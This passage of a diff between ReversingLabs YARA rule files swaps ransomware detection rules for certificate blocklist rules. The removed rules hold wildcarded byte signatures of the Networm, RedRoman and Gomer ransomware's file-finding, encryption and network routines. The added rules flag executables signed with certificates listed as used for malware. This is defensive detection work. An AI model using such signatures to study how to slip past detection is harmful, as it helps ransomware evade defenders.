-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Networm.yara#L1-L103"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11992-L12010"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ff9bcb9868522f9d4abf2ab9f94d5b7c9b009e5c6d0cf832c7d052f18e048b31"
+		logic_hash = "f5ec67c082be21a2495ef90fd0a6d4fc4b1379c4903dcc051d39cf1913d5cf20"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Networm"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F1 89 B5 ?? ?? ?? ?? 8B 7D ?? 33 DB
-            6A ?? 59 33 C0 89 5D ?? 89 4D ?? 66 89 45 ?? 89 5D ?? 89 5D ?? 89 4D ?? 66 89 45 ??
-            68 ?? ?? ?? ?? 8B D7 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 4D ?? 3B C8
-            74 ?? 88 9D ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ??
-            8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 66 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 8D
-            4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D7 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 8D
-            ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? F6 85
-            ?? ?? ?? ?? ?? 8D 45 ?? 74 ?? 6A ?? 50 8B CE E8 ?? ?? ?? ?? 8B F0 85 F6 0F 85 ?? ??
-            ?? ?? 8B B5 ?? ?? ?? ?? EB ?? 83 7D ?? ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 FF 15 ?? ??
-            ?? ?? 85 C0 74 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ??
-            8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 53 FF 15 ?? ??
-            ?? ?? 8B 1D ?? ?? ?? ?? FF D3 8B F0 83 FE ?? 75 ?? 83 7F ?? ?? 8B C7 72 ?? 8B 07 68
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 7F ?? ?? 72 ?? 8B 3F 57 FF 15 ?? ??
-            ?? ?? 85 C0 75 ?? FF D3 8B F0 EB ?? FF 15 ?? ?? ?? ?? EB ?? 33 F6 8D 4D ?? E8 ?? ??
-            ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? C2
-        }
-		$remote_connection_p1 = {
-            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 5D ?? 56 57 6A ?? 8B FA 8B F1
-            FF 15 ?? ?? ?? ?? 33 C0 50 50 89 45 ?? 89 45 ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 57 56
-            FF 15 ?? ?? ?? ?? 8B D3 8B C8 E8 ?? ?? ?? ?? 83 3B ?? 8B F0 75 ?? 68 ?? ?? ?? ?? EB
-            ?? 81 3B ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? EB ?? 81 3B ?? ?? ??
-            ?? 74 ?? 81 3B ?? ?? ?? ?? 74 ?? 85 F6 74 ?? 83 C8 ?? EB ?? 83 65 ?? ?? 8D 75 ?? 8B
-            45 ?? 8B FB C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? A5 A5 A5 8B 4D ?? 5F 5E 33 CD 5B E8 ??
-            ?? ?? ?? C9 C3
-        }
-		$remote_connection_p2 = {
-            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 5D ?? 56 57 6A ?? 8B FA 8B F1
-            FF 15 ?? ?? ?? ?? 33 C0 50 50 50 89 45 ?? 8D 45 ?? 50 FF 75 ?? 57 56 FF 15 ?? ?? ??
-            ?? 8B D3 8B C8 E8 ?? ?? ?? ?? 83 3B ?? 8B F0 75 ?? 68 ?? ?? ?? ?? EB ?? 81 3B ?? ??
-            ?? ?? 75 ?? 68 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 85 F6 74 ?? 83 C8 ?? EB ?? 83 65 ??
-            ?? 8D 75 ?? 8B 45 ?? 8B FB C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? A5 A5 A5 8B 4D ?? 5F 5E
-            33 CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ??
-            33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 8B 45 ?? 83 F8 ?? C7 45 ?? ?? ?? ?? ?? 0F
-            94 C7 83 F8 ?? 0F 94 C3 83 F8 ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 0F B6 C3 83 F0 ?? 8D 04
-            45 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 6A ?? FF 76 ?? FF 15 ?? ?? ?? ?? 8B C8 89 4E ??
-            85 C9 0F 84 ?? ?? ?? ?? 84 FF 74 ?? BF ?? ?? ?? ?? EB ?? 0F B6 C3 8D 3C 45 ?? ?? ??
-            ?? 8B 56 ?? 8B 46 ?? 85 D2 7C ?? 0F 8F ?? ?? ?? ?? 85 C0 72 ?? 85 D2 7C ?? 0F 8F ??
-            ?? ?? ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 83 F8 ?? 74 ?? 89 55 ?? EB ?? 0F 57 C0 66 0F 13
-            45 ?? 8B 45 ?? FF 75 ?? 50 FF 75 ?? FF 75 ?? 57 51 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D
-            4D ?? 89 46 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ??
-            59 5F 5E 5B 8B E5 5D C2
-        }
-		$encrypt_files_p2 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 56 A1 ?? ?? ?? ?? 33 C5
-            50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 83 7E ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 85 ?? ?? ??
-            ?? 8B 4D ?? 85 C9 74 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? EB ?? 8B 45 ?? 85 C0 74 ?? 0F
-            8E ?? ?? ?? ?? 83 F8 ?? 7E ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? EB ?? F6 C1 ?? C7 45 ?? ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 0F 95 C0 40 89 45 ?? 83 7D ?? ?? 7F ?? 0F 8C ?? ?? ?? ?? 83
-            7D ?? ?? 0F 82 ?? ?? ?? ?? 83 7D ?? ?? 7F ?? 0F 8C ?? ?? ?? ?? 83 7D ?? ?? 0F 82 ??
-            ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 8D 45 ?? 8B
-            CE 50 E8 ?? ?? ?? ?? 8D 45 ?? 8B CE 50 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B E5 5D C2 ?? ?? 8D 45 ?? 6A
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 C6 45 ??
-            ?? E8 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 8D 4D ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 45
-            ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 C6
-            45 ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PHL E STATE ApS" and ( pe.signatures [ i ] . serial == "00:b2:f9:c6:93:a2:e6:63:45:65:f6:3c:79:b0:1d:d8:f8" or pe.signatures [ i ] . serial == "b2:f9:c6:93:a2:e6:63:45:65:f6:3c:79:b0:1d:d8:f8" ) and 1620000000 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_54A6D33F73129E0Ef059Ccf51Be0C35E : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "1cf2bda8-05e6-5f0a-a28a-2f5fa02775c9"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12012-L12028"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "6fbed9c8537ea2baeb58044a934fc9741730b8a3ae4d059c23b033973d7ff7d3"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STAFFORD MEAT COMPANY, INC." and pe.signatures [ i ] . serial == "54:a6:d3:3f:73:12:9e:0e:f0:59:cc:f5:1b:e0:c3:5e" and 1607100127 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Redroman : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_142Aac4217E22B525C8587589773Ba9B : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects RedRoman ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c860586a-fa50-5bb4-a3b4-13506f9d6030"
-		date = "2021-05-10"
-		modified = "2021-05-10"
+		id = "488be2f7-e3d4-51e3-b7bb-142caa7b2bd5"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.RedRoman.yara#L1-L82"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12030-L12046"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6fb2ac0e7f7ac095766e27c057e5124406dc493c08d01a7e5381403d794c7240"
+		logic_hash = "f169925c27f5e0f8d5f658b83d1b9fa4548c4443b16bd4d7f87aa2b8e44bf06b"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "RedRoman"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ??
-            ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ??
-            ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 4C 8D 8C 24 ?? ?? ?? ?? 41 B8 ?? ??
-            ?? ?? BA ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 C7 84
-            24 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 85 C0 75 ?? 33 D2 48 8B 8C 24 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8D 84 24 ?? ??
-            ?? ?? 48 89 44 24 ?? 41 B9 ?? ?? ?? ?? 45 33 C0 BA ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 6B C9 ?? 48 89 84 0C ?? ?? ?? ?? 48 C7 84 24
-            ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 85 C0 75 ?? B8 ?? ?? ?? ?? 48 6B C0 ?? 48 83 BC 04 ??
-            ?? ?? ?? ?? 74 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 84
-            24 ?? ?? ?? ?? EB ?? 33 D2 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 33 D2 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 49 ?? 48 89 01 48 8B 44 24 ?? 48 8B
-            40 ?? 48 83 38 ?? 75 ?? 48 8D 15 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? B8 ?? ??
-            ?? ?? 48 6B C0 ?? 48 83 BC 04 ?? ?? ?? ?? ?? 74 ?? B8 ?? ?? ?? ?? 48 6B C0 ?? 48 8B
-            8C 04 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B8
-        }
-		$encrypt_files_p2 = {
-            4C 8D 05 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 48 8B 4D ?? 48 8B 55 ?? E8 ?? ?? ?? ?? 48 89
-            55 ?? 48 89 45 ?? EB ?? 31 C0 41 89 C0 48 8B 4D ?? 48 8B 55 ?? E8 ?? ?? ?? ?? 48 89
-            45 ?? EB ?? 48 8B 45 ?? 48 83 F8 ?? 74 ?? 48 8B 55 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? EB ?? EB ?? 48 81 C4 ?? ?? ?? ?? 5D C3 48 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 48 8B
-            85 ?? ?? ?? ?? 48 85 C0 74 ?? EB ?? EB ?? 0F 0B 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ??
-            ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ??
-            ?? ?? C6 85 ?? ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ??
-            ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ??
-            ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ??
-            48 89 85 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ??
-            48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 85
-            C0 74 ?? EB ?? EB ?? 0F 0B 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ??
-            ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ??
-            ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ??
-            ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ??
-            48 8B 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 89 8D
-        }
-		$find_files = {
-            48 8D 9C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 D9 31 D2 E8 ?? ?? ?? ?? 48 8B 0F 48
-            89 DA E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 4C 8D B4 24 ?? ?? ?? ?? 48 8D 9C 24 ??
-            ?? ?? ?? 66 83 BC 24 ?? ?? 00 00 ?? 74 ?? EB ?? 0F 1F 84 00 ?? ?? ?? ?? 48 8B 0F 48
-            89 DA E8 ?? ?? ?? ?? 85 C0 74 ?? 66 83 BC 24 ?? ?? 00 00 ?? 75 ?? 0F B7 84 24 ?? ??
-            ?? ?? 66 85 C0 74 ?? 66 83 F8 ?? 75 ?? 66 83 BC 24 ?? ?? 00 00 ?? 74 ?? 48 8B 47 ??
-            F0 48 83 00 ?? 0F 8E ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 41
-            B8 ?? ?? ?? ?? 4C 89 F1 E8 ?? ?? ?? ?? 48 C7 06 ?? ?? ?? ?? 48 8D 4E ?? 48 8D 94 24
-            ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 48
-            C7 06 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 48 C7 06 ?? ?? ?? ?? C6 46 ?? ?? 89 46 ?? 48
-            89 F0 0F 28 B5 ?? ?? ?? ?? 0F 28 BD ?? ?? ?? ?? 44 0F 28 85 ?? ?? ?? ?? 44 0F 28 8D
-            ?? ?? ?? ?? 44 0F 28 95 ?? ?? ?? ?? 44 0F 28 9D ?? ?? ?? ?? 44 0F 28 A5 ?? ?? ?? ??
-            44 0F 28 AD ?? ?? ?? ?? 44 0F 28 B5 ?? ?? ?? ?? 44 0F 28 BD ?? ?? ?? ?? 48 8D A5 ??
-            ?? ?? ?? 5B 5F 5E 41 5E 5D C3 0F 0B
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "A.B. gostinstvo trgovina posredni\\xC5\\xA1tvo in druge storitve, d.o.o." and pe.signatures [ i ] . serial == "14:2a:ac:42:17:e2:2b:52:5c:85:87:58:97:73:ba:9b" and 1614124800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Gomer : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_239664C12Baeb5A6D787912888051392 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Gomer ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b76ac856-2abe-531d-b093-461569b9afb7"
-		date = "2020-10-08"
-		modified = "2020-10-08"
+		id = "4d24a880-6fa5-5c22-875e-29f4985e3750"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Gomer.yara#L1-L106"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12048-L12064"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a53d37fcb877a12a4969a6ea1aaa67fc4106c3fbdd80a4fd39ad5a66a9df47fc"
+		logic_hash = "ab2c228088a4c11b3a0f1a5f0acf181cc31e548781cb3f1205475bfbe39c7236"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Gomer"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B
-            7D ?? 2B CA D1 F9 83 C8 ?? 41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 56 8D 5F ??
-            03 D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ??
-            ?? 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 75 ?? 8B 4D ?? 56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5F
-            5B 8B E5 5D C3 33 C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ??
-            ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 56 57 6A ?? 5E 6A ??
-            89 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 5F EB ?? 0F B7 01 66 3B 85 ?? ?? ??
-            ?? 74 ?? 66 3B C6 74 ?? 66 3B C7 74 ?? 83 E9 ?? 3B CB 75 ?? 0F B7 31 66 3B F7 75 ??
-            8D 43 ?? 3B C8 74 ?? 52 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 6A ??
-            8B C6 33 FF 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 8B C7
-        }
-		$find_files_p2 = {
-            EB ?? 33 C0 40 2B CB 0F B6 C0 D1 F9 41 F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50
-            57 53 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? 8B 85 ?? ?? ?? ?? 50 57 57 53 E8 ?? ??
-            ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD
-            5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 8D ?? ?? ?? ?? 6A ?? 8B 41 ?? 2B 01 C1 F8 ?? 89 85
-            ?? ?? ?? ?? 58 66 39 85 ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 66 39 85 ?? ??
-            ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 51 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 8B 8D
-            ?? ?? ?? ?? 85 C0 6A ?? 58 75 ?? 8B C1 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8
-            ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ??
-            83 C4 ?? E9
-        }
-		$encrypt_files = {
-            55 8B EC 51 8B 45 ?? 53 56 57 8B F9 8B 4F ?? 89 4D ?? 3B C1 77 ?? 8B DF 83 F9 ?? 72
-            ?? 8B 1F 8D 34 00 89 47 ?? 56 FF 75 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 04 1E
-            8B C7 5F 5E 5B 8B E5 5D C2 ?? ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8B F0 83 CE ?? 81
-            FE ?? ?? ?? ?? 76 ?? BE ?? ?? ?? ?? EB ?? 8B D1 B8 ?? ?? ?? ?? D1 EA 2B C2 3B C8 76
-            ?? BE ?? ?? ?? ?? EB ?? 8D 04 0A 3B F0 0F 42 F0 8D 46 ?? 8D 0C 00 3D ?? ?? ?? ?? 76
-            ?? 83 C9 ?? EB ?? 81 F9 ?? ?? ?? ?? 72 ?? 8D 41 ?? 83 CA ?? 3B C1 0F 46 C2 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 58 ?? 83 E3 ?? 89 43 ?? EB ?? 85 C9 74 ?? 51 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B D8 EB ?? 33 DB 8B 45 ?? 89 77 ?? 89 47 ?? 8D 34 00 56 FF 75 ??
-            53 E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 66 89 04 1E 8B 45 ?? 83 F8 ?? 72 ?? 8D 0C 45 ?? ??
-            ?? ?? 8B 07 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 77 ??
-            8B C2 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 1F 8B C7 5F 5E 5B 8B E5 5D C2 ?? ?? E8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? CC CC CC CC CC B8 ?? ?? ?? ?? C3
-        }
-		$enum_drives_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
-            45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 15 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 6A ?? 33 C0 C7
-            45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? C6
-            45 ?? ?? BF ?? ?? ?? ?? 8D 45 ?? 0F A3 38 0F 83 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8D
-            47 ?? 0F 43 4D ?? 66 89 01 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 83
-            F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 33 C9 C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? 66 89 4D ?? C6 45 ?? ?? 83 F8 ?? 75 ?? 6A ?? 68 ?? ?? ?? ?? EB ??
